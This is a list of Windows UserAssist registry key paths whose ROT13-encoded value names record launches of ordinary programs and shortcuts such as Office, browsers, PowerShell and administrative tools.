                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbageby.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.Uryccnar

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf Qrsraqre\ZFNFPhv.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pyrnazte.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\freivprf.zfp

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{Q4N262QQ-PR44-Q105-S36O-9Q77N8PO65N4}

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\ZFRqtr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfpbasvt.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr 15\PyvragK64\bssvprpyvpxgbeha.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\Bssvpr\Frghc32.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\PyvpxGbEha\BssvprPyvpxGbEha.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\PyvpxGbEha\BssvprP2EPyvrag.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qbjaybnqf\FrghcCebq_BssFpeho.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zzp.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P1P6S8NP-40N3-0S5P-146S-65N9QP70OOO4}

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprff 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Rkpry 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Sversbk.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Tbbtyr Puebzr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Vagrearg Rkcybere.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Tbbtyr Puebzr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreFuryy\CbjreFuryy 7-cerivrj (k64).yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2013\Jbeq 2013.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Purpx Sbe Hcqngrf.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\P:\CebtenzQngn\Zvpebfbsg\Jvaqbjf\Fgneg Zrah\Jvaqbjf Hcqngr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Rqtr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2013\Rkpry 2013.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\BarAbgr 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Sversbk.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jbeq 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jbeq 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Bhgybbx 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreCbvag 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Choyvfure 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fxlcr sbe Ohfvarff 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\7-Mvc\7-Mvc Svyr Znantre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy (k86).yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR (k86).yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\NhgbUbgxrl.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\Pbaireg .nux gb .rkr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Obkfgnegre\Obkfgnegre Furyy.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Nobhg Wnin.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Pbasvther Wnin.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Qngnonfr Pbzcner 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Ynathntr Cersreraprf.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Hcybnq Pragre.yax

                    
